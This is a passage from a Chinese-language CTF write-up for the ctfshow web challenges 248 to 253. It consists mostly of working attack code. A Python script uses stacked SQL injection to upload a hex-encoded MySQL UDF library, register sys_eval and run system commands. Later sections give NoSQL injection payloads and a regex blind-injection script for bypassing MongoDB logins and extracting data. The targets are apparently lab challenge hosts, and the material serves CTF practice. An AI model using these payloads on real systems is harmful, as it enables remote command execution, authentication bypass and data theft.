A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400'
codes=[]
for i in range(0,len(code),128):
    codes.append(code[i:min(i+128,len(code))])
 
#建临时表
sql='''create table temp(data longblob)'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#清空临时表
sql='''delete from temp'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#插入第一段数据
sql='''insert into temp(data) values (0x{})'''.format(codes[0])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#更新连接剩余数据
for k in range(1,len(codes)):
    sql='''update temp set data = concat(data,0x{})'''.format(codes[k])
    payload='''0';{};-- A'''.format(sql)
    requests.get(url+payload)
 
#10.3.18-MariaDB    
#写入so文件
sql='''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#引入自定义函数
sql='''create function sys_eval returns string soname 'udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#命令执行,结果更新到界面
sql='''update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#查看结果
r=requests.get(url[:-4]+'?page=1&limit=10')
print(r.text)

web249

http://rui0.cn/archives/609
https://www.anquanke.com/post/id/97211
https://gylq.gitee.io/2021/08/04/%E3%80%90MongoDB%E3%80%91%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4%E4%BD%BF%E7%94%A8/

nosql

$user = $memcache->get($id);

payload:

api/?id[]=flag

web250

  $query = new MongoDB\Driver\Query($data);
  $cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();

//无过滤
  if(count($cursor)>0){
    $ret['msg']='登陆成功';
    array_push($ret['data'], $flag);
  }
username[$ne]=1&password[$ne]=1

有的时候服务器会摆,重启一下试试

web251

post传入:

username[$regex]=.*&password[$regex]=.*

web252

username[$regex]=f.*&password[$ne]=1

image.png

web253

这里直接用别人的脚本了:
道理是相同的,一点点猜即可。

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/4
# blog: gylq.gitee.io
import requests

url = "http://a2efa0f0-f634-4621-bd4a-e96a4f1b0196.challenge.ctf.show:8080/api/"
str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,,"
flag = ""

payload_user = "flag.*"
payload_pass = "^{}.*"

n = 0

for i in range(1, 666):
    for j in str:
        data = {
            'username[$regex]':payload_user,
            'password[$regex]':payload_pass.format(flag+j)
        }
        res = requests.post(url = url, data=data)
        if r"\u767b\u9646\u6210\u529f" in res.text:
            flag += j
            n += 1
            print('[*] 开始盲注第{}位'.format(n))
            print(flag)
            if j == "}":
                print('[*] flag is {}'.format(flag))
                exit()
            break

image.png